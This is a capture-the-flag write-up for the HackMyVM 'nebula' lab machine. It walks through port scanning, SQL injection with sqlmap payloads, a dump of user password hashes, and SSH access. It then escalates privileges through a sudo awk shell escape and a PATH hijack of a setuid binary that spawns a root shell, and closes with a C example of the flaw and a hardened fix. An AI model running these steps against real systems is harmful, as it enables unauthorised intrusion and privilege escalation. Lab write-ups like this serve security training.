hack-my-vm:nebula

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.26                                                                                  [23:43:47]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 23:44 CST
Nmap scan report for 192.168.1.26
Host is up (0.00098s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:FC:59:B0 (Oracle VirtualBox virtual NIC)

Only two ports are open, so there is no need for a deeper scan; we go straight to exploitation.

Port 80

First a look at the home page. Yes, nothing useful was found. Well, actually a login form was found, and I guessed it has SQL injection, but let's not try that yet and start with directory enumeration.

kali@kali [~] ➜  gobuster  dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.1.26                    [23:46:04]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.26
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 310] [--> http://192.168.1.26/img/]
/login (Status: 301) [Size: 312] [--> http://192.168.1.26/login/]
/joinus (Status: 301) [Size: 313] [--> http://192.168.1.26/joinus/]
/server-status (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

Something good was found in http://192.168.1.26/joinus/


Clicking it downloads a PDF, which leaks the administrator's password.


Log in directly and enter the back end. I guess the id lookup service it provides has a SQL injection vulnerability.


Test it straight from the URL; the injection point is presumably id.

kali@kali [~] ➜  sqlmap -u "http://192.168.1.26/login/search_central.php?id=1"                                                                   [23:49:40]
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:57:52 /2025-01-20/

[23:57:52] [INFO] resuming back-end DBMS 'mysql'
[23:57:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4022=4022 AND 'lVHX'='lVHX

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1319 FROM (SELECT(SLEEP(5)))uOrx) AND 'WaFN'='WaFN

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x7171707671,0x436a434b6e7364716671516d4247756c4453476245614a7264596974696d567758686c586c505345,0x71626b6b71),NULL,NULL-- -
---
[23:57:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:57:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.26'

[*] ending @ 23:57:52 /2025-01-20/

Dump the data directly

[23:58:38] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] nebuladb

// database names


[23:58:51] [INFO] fetching tables for database: 'nebuladb'
Database: nebuladb
[3 tables]
+----------+
| central |
| centrals |
| users |
+----------+

// table names

Database: nebuladb
Table: users
[7 entries]
+----+----------+----------------------------------------------+-------------+
| id | is_admin | password | username |
+----+----------+----------------------------------------------+-------------+
| 1 | 1 | d46df8e6a5627debf930f7b5c8f3b083 | admin |
| 2 | 0 | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral |
| 3 | 0 | 5f823f1ac7c9767c8d1efbf44158e0ea | Frederick |
| 3 | 0 | 4c6dda8a9d149332541e577b53e2a3ea | Samuel |
| 5 | 0 | 41ae0e6fbe90c08a63217fc964b12903 | Mary |
| 6 | 0 | 5d8cdc88039d5fc021880f9af4f7c5c3 | hecolivares |
| 7 | 1 | c8c605999f3d8352d7bb792cf3fdb25b (999999999) | pmccentral |
+----+----------+----------------------------------------------+-------------+

// data

MySQL cracked the hash for us (the plaintext is shown in parentheses). We can see there is a second administrator, presumably the user that can log in over SSH.

kali@kali [~] ➜  ssh pmccentral@192.168.1.26                                                                                                      [0:02:44]
pmccentral@192.168.1.26's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-204-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon 20 Jan 2025 04:03:14 PM UTC

System load: 0.45
Usage of /: 39.6% of 9.75GB
Memory usage: 16%
Swap usage: 0%
Processes: 126
Users logged in: 0
IPv4 address for enp0s3: 192.168.1.26
IPv6 address for enp0s3: 2409:8a70:2a31:d8b0:a00:27ff:fefc:59b0

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.

https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

48 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Mon Jan 20 16:02:14 2025 from 192.168.1.4
pmccentral@laboratoryuser:~$ whoami
pmccentral

We got a user, but unfortunately no flag.

Privilege escalation

pmccentral@laboratoryuser:~$ sudo -l
[sudo] password for pmccentral:
Matching Defaults entries for pmccentral on laboratoryuser:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pmccentral may run the following commands on laboratoryuser:
(laboratoryadmin) /usr/bin/awk

We can see that we may run awk as the laboratoryadmin user, so we look up sudo privilege escalation via awk.

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo awk 'BEGIN {system("/bin/sh")}'

Above is the awk sudo escalation command we found; if you don't understand it, you can ask GPT to explain it. We use it directly.

pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin  awk 'BEGIN {system("/bin/sh")}'
$ whoami
laboratoryadmin

We obtain this user's privileges, but the shell is poorly interactive. The machine has python3, so we use it to spawn a more stable terminal.

$ python3
Python 3.8.10 (default, Nov 7 2024, 13:10:47)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
laboratoryadmin@laboratoryuser:/home/pmccentral$ whoami
laboratoryadmin
laboratoryadmin@laboratoryuser:/home/pmccentral$

python3 -c 'import pty; pty.spawn("/bin/bash")' is the python3 command for spawning a stable, fully interactive terminal.

Run linpeas directly to look for sensitive files on the machine.

-rwsr-xr-x 1 root root 87K Feb  6  2024 /snap/core20/2434/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr 9 2024 /snap/core20/2434/usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Feb 6 2024 /snap/core20/2434/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb 6 2024 /snap/core20/2434/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Apr 9 2024 /snap/core20/2434/usr/bin/su
-rwsr-xr-x 1 root root 163K Apr 4 2023 /snap/core20/2434/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Apr 9 2024 /snap/core20/2434/usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-- 1 root systemd-resolve 51K Oct 25 2022 /snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 467K Jan 2 2024 /snap/core20/2434/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 129K Sep 15 2023 /snap/snapd/20290/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 177K Dec 4 09:13 /snap/snapd/23545/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 17K Dec 17 2023 /home/laboratoryadmin/autoScripts/PMCEmployees (Unknown SUID binary!)

Above is part of the SUID file list produced by the linpeas script. Note the last entry: there is a file under the laboratoryadmin user's home directory, so let's look at it.

laboratoryadmin@laboratoryuser:~$ file /home/laboratoryadmin/autoScripts/PMCEmployees
/home/laboratoryadmin/autoScripts/PMCEmployees: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2e8e1b3a3f1bba666df17c97871f88b0377343fb, for GNU/Linux 3.2.0, not stripped
laboratoryadmin@laboratoryuser:~$ strings /home/laboratoryadmin/autoScripts/PMCEmployees
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Showing top 10 best employees of PMC company
head /home/pmccentral/documents/employees.txt
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
PMCEmployees.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

We found the command head /home/pmccentral/documents/employees.txt among the strings. The head command is not given as a full path, so we can simply hijack head.

laboratoryadmin@laboratoryuser:/tmp$ cat head 
cp /bin/bash /tmp/rootsh; chmod +xs /tmp/rootsh
laboratoryadmin@laboratoryuser:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
laboratoryadmin@laboratoryuser:/tmp$ cd /home/laboratoryadmin/autoScripts;./PMCEmployees;cd /tmp
laboratoryadmin@laboratoryuser:/tmp$ ./rootsh -p
rootsh-5.0# whoami
root
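As an added example (not the box's own source, which is visible only through its strings output), here is the C shape that produces exactly those strings beside a hardened version that uses an absolute path, no shell, and a fixed environment. The file path and banner text come from the page; the function names are assumptions.

```c
/* Added example reconstructing the PMCEmployees pattern and a hardened form.
 * Only the path and the banner are taken from the page; the rest is assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

static const char *EMPLOYEES = "/home/pmccentral/documents/employees.txt";

/* Returns 1 if the command word is a bare program name (resolved through the
 * caller's PATH, which a setuid program does not control), 0 if absolute. */
int command_is_hijackable(const char *cmd)
{
    while (*cmd == ' ')
        cmd++;                        /* skip leading blanks */
    return cmd[0] != '/';
}

/* VULNERABLE shape matching the strings: a setuid binary hands a relative
 * "head" to system(), so a writable directory at the front of PATH decides
 * which program runs as root. */
void show_employees_vulnerable(void)
{
    printf("Showing top 10 best employees of PMC company\n");
    setuid(0);
    system("head /home/pmccentral/documents/employees.txt");
}

/* HARDENED: absolute path, execve instead of a shell, and a minimal fixed
 * environment so PATH, IFS and friends are never inherited from the caller.
 * Returns the child's exit status, or -1 if fork or waitpid failed. */
int show_employees_hardened(void)
{
    char *const argv[] = {"/usr/bin/head", "--", (char *)EMPLOYEES, NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    printf("Showing top 10 best employees of PMC company\n");
    fflush(stdout);                   /* keep output ordered before fork */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);  /* only returns on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The hardened version still relies on the binary being setuid; the better fix is to drop the setuid bit and grant read access to the file instead.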

Done. This box is not hard.